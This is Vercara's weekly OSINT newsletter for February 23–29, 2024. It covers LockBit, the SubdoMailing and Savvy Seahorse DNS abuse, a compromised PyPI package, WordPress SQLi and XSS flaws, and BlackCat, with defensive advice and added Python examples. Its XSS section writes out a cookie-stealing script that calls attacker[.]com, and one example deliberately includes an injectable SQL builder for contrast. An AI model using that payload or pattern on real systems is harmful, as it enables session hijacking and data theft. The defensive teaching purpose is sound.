
Vercara’s Open-Source Intelligence (OSINT) Report – February 23 – 29, 2024

Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. 

NOTE: Except where indicated, this report is released as TLP: CLEAR, and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.


LockBit ransomware returns, restores servers after police disruption.

(TLP: CLEAR) The LockBit ransomware gang has swiftly relaunched its operations on a new infrastructure, just days after law enforcement dismantled their previous servers. In a message presented as an FBI leak, the gang acknowledged their negligence in enabling the breach and outlined their plans. The authorities had taken down 34 servers hosting the data leak website, cryptocurrency addresses, decryption keys, and an affiliate panel. LockBit confirmed the breach, attributing it to outdated PHP servers that were not promptly updated. The gang, now focusing on government targets, believes law enforcement targeted them due to a ransomware attack on Fulton County in January. LockBit plans to enhance security by decentralizing affiliate panels and manually releasing decryptors. The message appears to be damage control, aimed at restoring the gang’s credibility following the setback.

(TLP: CLEAR) Comments: It is not surprising that LockBit was able to reestablish their operations in a short amount of time after the FBI and other government agencies took down their IT infrastructure. It is assessed that LockBit already had redundant IT infrastructure in place to which they could easily pivot their operations. This is a reminder that even though law enforcement can dismantle criminal infrastructure, that does not necessarily mean that the threat posed by that criminal organization is gone.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS Requirement 12.6.3.1: “Security awareness training includes awareness of threats and vulnerabilities that could impact the security of the CDE, including but not limited to:

  • Phishing and related attacks.
  • Social engineering.”

Since most ransomware attacks start with a social engineering attack, it is highly advised that organizations have a robust and continuous cybersecurity training program that teaches their employees how to identify malicious emails and other social engineering attacks.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://www.bleepingcomputer.com/news/security/lockbit-ransomware-returns-restores-servers-after-police-disruption/

Hijacked subdomains of major brands used in massive spam campaign.

(TLP: CLEAR) The “SubdoMailing” ad fraud campaign has emerged as a massive threat, utilizing over 8,000 legitimate internet domains and 13,000 subdomains to send up to five million emails per day. The campaign involves the hijacking of abandoned subdomains and domains belonging to well-known companies, such as MSN, VMware, McAfee, and others. Exploiting the legitimacy of these domains allows the fraudulent emails to bypass spam filters. Clicking on embedded buttons in the emails leads users through a series of redirections, generating revenue for threat actors via fraudulent ad views. The campaign has been active since 2022 and employs various tactics, including CNAME hijacking and SPF record exploitation. Guardio Labs attributes the campaign to a threat actor named “ResurrecAds,” utilizing nearly 22,000 unique IPs and operating through a vast network of domains and subdomains. Guardio Labs has created a SubdoMailing checker site to help domain owners detect abuse and take preventive measures.

(TLP: CLEAR) Comments: The “SubdoMailing” ad fraud campaign highlights the importance of maintaining constant vigilance and implementing a proactive strategy to safeguard legitimate internet infrastructure from malicious exploitation. To effectively counteract such threats, it is essential for organizations to regularly monitor their domain and subdomain usage, employ robust cybersecurity measures, and educate their employees about the risks of phishing and other fraudulent activities.

(TLP: CLEAR) Recommended best practices/regulations:

FIRST DNS Abuses Techniques Matrix Item 19: “Spoofing of a registered domain – In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is in fact controlled by or registered to a legitimate registrant.”

PCI-DSS 8.3.4: “All user access to system components for users and administrators is authenticated via at least one of the following authentication factors:

  • Something you know, such as a password or passphrase.
  • Something you have, such as a token device or smart card.
  • Something you are, such as a biometric element.”
For administrative access to DNS zones, it is recommended to:

  • Use Two Factor Authentication on the DNS management web portal as well as at the registrar.
  • Employ registrar locks when available.
  • Keep track of all contact and recovery emails to make sure they are company controlled, not personal emails.
  • Review existing accounts with registrars and others.
  • Ensure that you have notifications in place about expiry dates.
  • Keep DMARC, DKIM, and SPF records up to date based on current domain registrations.
  • Monitor the issuance of any new SSL Certificates for your domains.
  • Enable DNSSEC on your zone; it could provide an early indication of compromise.
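The SubdoMailing campaign above relied on subdomains whose CNAME targets and SPF include domains had lapsed. The following is an added example (not Vercara's code) of the kind of zone audit the list recommends: it walks a constructed zone snapshot and flags CNAMEs pointing at names that no longer resolve and SPF records that still authorise senders via dead domains. The zone contents and the set of live names are constructed for the example; in practice they would come from a zone export and real DNS and registration lookups.

```python
"""Audit a zone snapshot for dangling CNAMEs and stale SPF includes.

Added example, not Vercara's code. ZONE and LIVE are constructed inline;
in practice they come from a zone export and live DNS/registration checks.
"""
from __future__ import annotations

# Constructed zone snapshot: owner name -> list of (rtype, rdata).
ZONE = {
    "example.com.": [("TXT", "v=spf1 include:_spf.mailhost.example include:old-vendor.example -all")],
    "promo.example.com.": [("CNAME", "promo-app.retired-saas.example.")],
    "www.example.com.": [("CNAME", "cdn-edge.example-cdn.example.")],
    "shop.example.com.": [("TXT", "v=spf1 redirect=expired-shop-mailer.example")],
}

# Constructed set of names that still resolve / are still registered.
LIVE = {"cdn-edge.example-cdn.example.", "_spf.mailhost.example."}


def _fqdn(name: str) -> str:
    """Normalise to a fully qualified name with a trailing dot."""
    return name if name.endswith(".") else name + "."


def spf_referenced_domains(txt: str) -> list[str]:
    """Return the domains named by include:/redirect= terms of an SPF record."""
    if not txt.lower().startswith("v=spf1"):
        return []
    out = []
    for term in txt.split()[1:]:
        term = term.lstrip("+-~?")  # drop the qualifier on e.g. ~include:
        if term.lower().startswith("include:"):
            out.append(_fqdn(term[len("include:"):]))
        elif term.lower().startswith("redirect="):
            out.append(_fqdn(term[len("redirect="):]))
    return out


def dangling_cnames(zone, live) -> list[tuple[str, str]]:
    """Owner names whose CNAME target no longer resolves (takeover candidates)."""
    found = []
    for owner, rrs in zone.items():
        for rtype, rdata in rrs:
            if rtype == "CNAME" and _fqdn(rdata) not in live:
                found.append((owner, _fqdn(rdata)))
    return sorted(found)


def stale_spf_includes(zone, live) -> list[tuple[str, str]]:
    """(owner, domain) pairs where SPF still delegates sending to a dead domain."""
    found = []
    for owner, rrs in zone.items():
        for rtype, rdata in rrs:
            if rtype == "TXT":
                for dom in spf_referenced_domains(rdata):
                    if dom not in live:
                        found.append((owner, dom))
    return sorted(found)


if __name__ == "__main__":
    for owner, target in dangling_cnames(ZONE, LIVE):
        print(f"dangling CNAME: {owner} -> {target}")
    for owner, dom in stale_spf_includes(ZONE, LIVE):
        print(f"stale SPF reference: {owner} authorises senders via {dom}")
```

Either finding is a record to remove or re-point before someone else registers the expired target.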

(TLP: CLEAR) Vercara: Vercara UltraDNS solutions include 2 separate diverse authoritative resolution platforms for an aggregate 47 nodes. UltraDNS provides resiliency, performance, and advanced features such as load-balancing, monitored failover, automated DNSSEC signing and geographic resolution.

Sources: https://www.bleepingcomputer.com/news/security/hijacked-subdomains-of-major-brands-used-in-massive-spam-campaign/

Huge surge in attacks exploiting user credentials to hack enterprises.

(TLP: CLEAR) Recent reporting has highlighted the vast amount of compromised credentials on the Dark Web and the significant threat they pose, making it easier for criminals to exploit legitimate accounts. Info-stealing malware, aimed at obtaining personally identifiable information, is expected to increase by 266% in 2024. Major attacks using legitimate accounts require more sophisticated response procedures from security teams, approximately 200% more than the average incident. Identity-based threats are on the rise, with cybercriminals increasingly using generative AI to enhance their attacks. Critical infrastructure organizations are particularly targeted, accounting for about 70% of attacks. Phishing emails, exploitation of public-facing applications, and the use of legitimate accounts contribute to over 85% of attacks. The report emphasizes that network compromise could have been avoided in around 85% of attacks through basic security measures like patching, multi-factor authentication, and least-privilege principles. Additionally, identity exploitation is a growing concern, with 50% of cyberattacks in the UK starting with legitimate accounts as the attack vector. The report urges organizations to adopt contemporary security practices to mitigate risks and strengthen defenses against evolving cyber threats.

(TLP: CLEAR) Comments: This reporting emphasizes that basic security measures, such as patching, multi-factor authentication, and least-privilege principles, could prevent approximately 85% of network compromises. As identity exploitation becomes an increased concern, with 50% of cyberattacks in the UK originating from legitimate accounts, organizations must prioritize strengthening their defenses against the evolving cyber threat landscape.

(TLP: CLEAR) Recommended best practices/regulations: Organizations should have a rigorous password policy that is in line with the National Institute of Standards and Technology (NIST) Digital Identity Guidelines (SP 800-63B). NIST SP 800-63B outlines requirements for length and complexity that should be implemented. Additionally, the password policy should have a set period for when passwords need to be changed, as well as a periodic review of all user accounts to ensure they are still valid and to delete any accounts that are no longer needed (i.e., accounts of personnel who have left the organization).

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://cybersecuritynews.com/user-credentials-hack-enterprises/

Sources: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf

Dormant PyPI package compromised to spread Nova Sentinel Malware.

(TLP: CLEAR) A dormant Python package named django-log-tracker, available on the Python Package Index (PyPI), was recently updated after almost two years to deliver the Nova Sentinel information-stealing malware. Phylum, a software supply chain security firm, detected the anomalous update on February 21, 2024. The package, last updated on GitHub in April 2022, suggests a compromise of the PyPI account belonging to the developer. The malicious update stripped the package of most of its original content, leaving only essential files behind. The update included code fetching and executing an executable named “Updater_1.4.4_x64.exe” from a remote server, embedding the Nova Sentinel malware. This incident underscores the risk of supply-chain attacks via compromised PyPI accounts. The affected package has been removed from PyPI.

(TLP: CLEAR) Comments: Malicious actors look to inject malicious code into popular code repositories to gain access to networks to which they would not normally have access.

(TLP: CLEAR) Recommended best practices/regulations: Executive Order 14028: “The security and integrity of “critical software” — software that performs functions critical to trust (such as affording or requiring elevated system privileges or direct access to networking and computing resources) — is a particular concern. Accordingly, the Federal Government must take action to rapidly improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

Injection attacks are the most common type of application attack, driven by the lack of a DevSecOps environment, reliance on third-party application development, and an overall lack of comprehensive input validation. It is advised that organizations establish sandbox testing to ensure there are no potential security concerns before deploying third-party code to production systems. Organizations should also conduct a static code review of all third-party code they use to verify that it does not introduce security concerns.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://thehackernews.com/2024/02/dormant-pypi-package-compromised-to.html

WordPress plugin alert – critical SQLi vulnerability threatens 200K+ websites.

(TLP: CLEAR) A critical security vulnerability has been identified in the WordPress plugin “Ultimate Member,” with over 200,000 active installations. Tracked as CVE-2024-1071, the flaw allows unauthenticated attackers to conduct SQL injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2. The issue arises due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. The vulnerability only affects users who have enabled the “Enable custom table for usermeta” option in the plugin settings. A fix for the flaw has been released in version 2.8.3, and users are advised to update the plugin promptly to mitigate potential threats. The disclosure comes amid a rise in a campaign using compromised WordPress sites to inject crypto drainers and exploit the Web3 ecosystem. Additionally, a new drainer-as-a-service (DaaS) scheme called CG has been discovered, running a large affiliate program with Telegram bots facilitating fraudulent operations.

(TLP: CLEAR) Comments: The Ultimate Member plugin allows individuals to self-register on a website with the objective of creating an advanced online community. This plugin includes front-end user profiles, front-end user registration, front-end user login, custom form fields, a user account page, custom user roles, member directories and much more. SQL injection attacks attempt to gain access to underlying databases to steal sensitive information.

(TLP: CLEAR) Recommended best practices/regulations: OWASP Top 10 A03: “An application is vulnerable to attack when:

  • User-supplied data is not validated, filtered, or sanitized by the application.
  • Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.
  • Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.
  • Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.”
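The Ultimate Member flaw above is an injection through a `sorting` parameter. A sort column or direction cannot be bound as a query parameter, so "prepare the query" in that position means mapping the request value onto a fixed allowlist rather than escaping it. The following is an added example (not the plugin's or WordPress's code) contrasting the A03 pattern, concatenating the raw request value, with an allowlist-based builder; the `members` table, its rows and the sort option names are constructed for the example.

```python
"""Sorting-parameter injection: vulnerable concatenation versus an allowlist.

Added example, not code from Ultimate Member or WordPress. The table, rows
and sort option names are constructed inline.
"""
from __future__ import annotations

import sqlite3

# Allowlist: request value -> exact SQL fragment permitted after ORDER BY.
SORT_OPTIONS = {
    "newest": "registered DESC",
    "oldest": "registered ASC",
    "name": "display_name ASC",
}


def build_query_vulnerable(sorting: str) -> str:
    """OWASP A03 pattern: the raw request value becomes part of the statement."""
    return f"SELECT id, display_name FROM members ORDER BY {sorting}"


def build_query_safe(sorting: str) -> str:
    """Only allowlisted keys reach the query; anything else is rejected outright."""
    try:
        return f"SELECT id, display_name FROM members ORDER BY {SORT_OPTIONS[sorting]}"
    except KeyError:
        raise ValueError(f"unsupported sorting value: {sorting!r}") from None


def _demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the plugin's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, display_name TEXT,"
        " registered TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO members (display_name, registered, email) VALUES (?, ?, ?)",
        [("alice", "2024-01-05", "alice@example.test"),
         ("bob", "2023-11-20", "bob@example.test")],
    )
    return conn


def list_members(sorting: str) -> list[tuple]:
    """Request handler using the safe builder; raises ValueError on bad input."""
    return _demo_db().execute(build_query_safe(sorting)).fetchall()


def vulnerable_builder_executes(sorting: str) -> bool:
    """True if the vulnerable builder runs an arbitrary SQL expression without error."""
    try:
        _demo_db().execute(build_query_vulnerable(sorting))
        return True
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    print(list_members("newest"))
    # The same value is accepted by the vulnerable builder and rejected by the safe one.
    print(vulnerable_builder_executes("random()"))
    try:
        list_members("random()")
    except ValueError as exc:
        print("rejected:", exc)
```

Logging the rejected values from the safe path gives a cheap detection signal for probing of the parameter.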

It is advised that the organization security policy includes routine reviews of all IT infrastructure including applications to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing the outdated systems or establishing extra security-in-depth measures to protect non-updated systems.

(TLP: CLEAR) Vercara: Vercara UltraWAF helps prevent common exploits of vulnerabilities in web applications that could lead to insertion of malware. Signatures for new vulnerabilities are constantly updated along with granular input validation controls and traffic filtering measures for flexibility. UltraWAF includes a number of tools for managing both benign and malicious bots including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.

Sources: https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html

Source: https://wordpress.org/plugins/ultimate-member/

XSS flaw in LiteSpeed cache plugin exposes millions of WordPress sites at risk.

(TLP: CLEAR) Patchstack researchers have identified a critical unauthenticated site-wide stored XSS vulnerability, tracked as CVE-2023-40000, in the LiteSpeed Cache plugin for WordPress. The plugin, with over 4 million active installations, allows an unauthenticated user to exploit the flaw through a single HTTP request, potentially stealing sensitive information or escalating privileges on the WordPress site. The vulnerability, residing in the ‘update_cdn_status’ function, results from the lack of input sanitization and output escaping. The issue has been addressed in version 5.7.0.1, released in October 2023, which includes proper permission checks and hash validation to restrict access to privileged users. Users are advised to update to the latest version to mitigate the risk.

(TLP: CLEAR) Comments: Cross-Site Scripting (XSS) is a web application attack in which malicious actors inject malicious executable scripts into the code of a trusted application or website. This example XSS payload would allow a malicious actor to steal a user's cookie, which could be used to hijack the user's session or steal sensitive information: <script>new Image().src="https://attacker[.]com/cookie.php?cookie="+document.cookie</script>. Sections of a website commonly used to inject these types of payloads are comment and blog sections; once injected, the script executes automatically whenever a user visits that page, and the user is unaware of the attack.

(TLP: CLEAR) Recommended best practices/regulations: Common Weakness Enumeration (CWE) 79: "Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications or transform it into something that does."

It is advised that the organization security policy includes routine reviews of all IT infrastructure including applications to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing the outdated systems or establishing extra security-in-depth measures to protect non-updated systems.
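As an added example (not the LiteSpeed Cache code) of the CWE-79 guidance above applied to a comment form: the cookie-stealing payload quoted in the Comments is run through a renderer that escapes untrusted values for the HTML body context, and the display-name field, where a strict format is known, is validated with an accept-known-good pattern. Field names, the character set and the length limit are assumptions for the example.

```python
"""Stored XSS in a comment form: accept-known-good input plus output escaping.

Added example, not the LiteSpeed Cache plugin's code. Field names and the
allowed character set are assumptions made for the example.
"""
import html
import re

# Payload quoted in the report's comments (domain defanged as quoted there).
PAYLOAD = ('<script>new Image().src="https://attacker[.]com/cookie.php?cookie="'
           '+document.cookie</script>')

# Accept-known-good: a display name is 1-40 letters, digits, spaces, dots or hyphens.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 .\-]{1,40}$")


def validate_display_name(value: str) -> str:
    """Reject anything outside the allowlisted character set (CWE-79 guidance)."""
    if not DISPLAY_NAME_RE.fullmatch(value):
        raise ValueError("display name contains characters outside the allowed set")
    return value


def render_comment(author: str, body: str) -> str:
    """Encode every untrusted value for the HTML body context before emitting it.

    Free-text bodies cannot be allowlisted the way a name can, so output
    escaping is the control that keeps a stored payload inert.
    """
    return (
        f'<div class="comment"><span class="author">{html.escape(author)}</span>'
        f"<p>{html.escape(body)}</p></div>"
    )


def contains_active_script(rendered: str) -> bool:
    """Detection helper: does the emitted HTML still contain a live <script> tag?"""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    page = render_comment("Mallory", PAYLOAD)
    print(page)
    print("live script present:", contains_active_script(page))
```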

(TLP: CLEAR) Vercara: Vercara UltraWAF helps prevent common exploits of vulnerabilities in web applications that could lead to insertion of malware. Signatures for new vulnerabilities are constantly updated along with granular input validation controls and traffic filtering measures for flexibility. UltraWAF includes a number of tools for managing both benign and malicious bots including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.

Sources: https://securityaffairs.com/159667/hacking/litespeed-cache-plugin-xss.html

Savvy Seahorse gang uses DNS CNAME records to power investor scams.

(TLP: CLEAR) A threat actor named Savvy Seahorse has been utilizing CNAME DNS records to create a Traffic Distribution System (TDS) for financial scam campaigns. The actor registers multiple subdomains for attack waves that share a common CNAME record, allowing rotation to new destinations to evade detection without altering the attack domain’s DNS settings. This technique, named ‘CNAME TDS,’ is the first publicly reported case of abusing DNS CNAMEs for TDS. Savvy Seahorse has been active since at least August 2021, conducting short attack waves lasting between five and ten days. The threat actor targets victims through Facebook ads, directing them to fake investment platforms where they are tricked into depositing funds and providing sensitive personal data. The campaigns involve chatbots that interact with victims to convince them of high investment returns, automating the scamming process. Savvy Seahorse spreads its infrastructure across multiple registrars and hosting providers to evade attribution and achieve operational resilience. The actor uses domain generation algorithms (DGAs) to create and manage thousands of domains for the CNAME TDS system, employing wildcard DNS responses to change the status of domains and make tracking and mapping infrastructure more difficult. The scams are promoted in multiple languages, indicating a global targeting scope. The malicious subdomains host registration forms designed to steal victims’ personal information, redirecting approved users to fake trading platforms where they can deposit funds using various payment methods.

(TLP: CLEAR) Comments: Much like how websites use a Content Delivery Network to deliver web content at scale when the Internet has moments of instability and outages, a Traffic Distribution System allows threat actors the ability to evade blocking using several adversarial engineering techniques that assume that a percentage of their malware infrastructure will be unavailable due to enterprise security controls or even law enforcement takedowns.

(TLP: CLEAR) Recommended best practices/regulations: FIRST DNS Abuse Matrix 15: "Malicious registration of selective second level domains – For example, before attacking a victim, adversaries purchase or register domains from an ICANN-accredited registrar that can be used during targeting." The resiliency of Traffic Distribution Systems calls for a more robust set of blocking mechanisms, such as proactive blocking with a Protective DNS solution.

(TLP: CLEAR) Vercara: To mitigate the impact of already-manipulated DNS records, Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://www.bleepingcomputer.com/news/security/savvy-seahorse-gang-uses-dns-cname-records-to-power-investor-scams/

FBI warns U.S. healthcare sector of targeted BlackCat ransomware attacks.

(TLP: CLEAR) The U.S. government has issued a warning about the resurgence of BlackCat (aka ALPHV) ransomware attacks targeting the healthcare sector. Since mid-December 2023, the healthcare sector has been the most victimized, with nearly 70 leaked victims. This resurgence is believed to be in response to a post by the ALPHV/BlackCat administrator, encouraging affiliates to target hospitals after operational action against the group in early December 2023. Despite a coordinated law enforcement operation last year that temporarily disrupted BlackCat, the group managed to regain control of its dark leak sites and continues to operate with a new TOR data leak portal. Recent attacks by BlackCat have targeted critical infrastructure organizations, including Prudential Financial, LoanDepot, Trans-Northern Pipelines, and UnitedHealth Group subsidiary Optum. In response to the escalating threat, the U.S. government is offering financial rewards of up to $15 million for information leading to the identification of key members and affiliates of the BlackCat ransomware group. The article also highlights the concurrent return of LockBit and the exploitation of critical security flaws in ConnectWise’s ScreenConnect remote desktop and access software by threat actors, including the BlackCat group. The use of remote access software like ScreenConnect remains a prime target for threat actors, as evidenced by the mass exploitation of vulnerabilities. Additionally, the article mentions other ransomware groups such as RansomHouse, Rhysida, and a Phobos variant called Backmydata compromising organizations worldwide. Some groups are adopting more sophisticated tactics, such as RansomHouse using a custom tool named MrAgent to automate and track the deployment of ransomware across large environments with a high number of hypervisor systems. Furthermore, there is a trend among ransomware groups to sell direct network access as a new monetization method. 
The article concludes by mentioning the release of a Linux-specific ransomware threat known as Kryptina, which surfaced in December 2023, posing a potential risk for increased ransomware attacks against Linux systems. It is important for organizations, especially in the healthcare sector, to be vigilant and implement robust cybersecurity measures to protect against the evolving tactics of ransomware groups like BlackCat.

(TLP: CLEAR) Comments: BlackCat/ALPHV is a sophisticated ransomware group that first emerged in November 2021 and operates as a Ransomware-as-a-Service (RaaS). BlackCat is known to conduct triple extortion against its victims (encryption, data leak, and DDoS attacks). This group continuously updates its Tactics, Techniques and Procedures (TTPs) to evade detection and bypass security control measures. In early 2023, the US Justice Department announced a campaign to disrupt BlackCat's operations, but BlackCat was able to adjust its IT infrastructure to mitigate any loss from this campaign.

(TLP: CLEAR) Recommended best practices/regulations: The Health Insurance Portability and Accountability Act (HIPAA) outlines security requirements for all healthcare providers. These requirements include administrative safeguards, physical safeguards and technical safeguards that must be adhered to. Also, organizations should conduct network assessments regularly to ensure only mission-critical ports and protocols are open, and close those not needed.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://thehackernews.com/2024/02/fbi-warns-us-healthcare-sector-of.html

Source: https://www.bleepingcomputer.com/news/security/fbi-cisa-warn-us-hospitals-of-targeted-blackcat-ransomware-attacks/

Source: https://www.hhs.gov/hipaa/for-professionals/security/laws-regulations/index.html

About Vercara.

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.

To learn more about Vercara solutions, please visit our solutions overview page or contact us.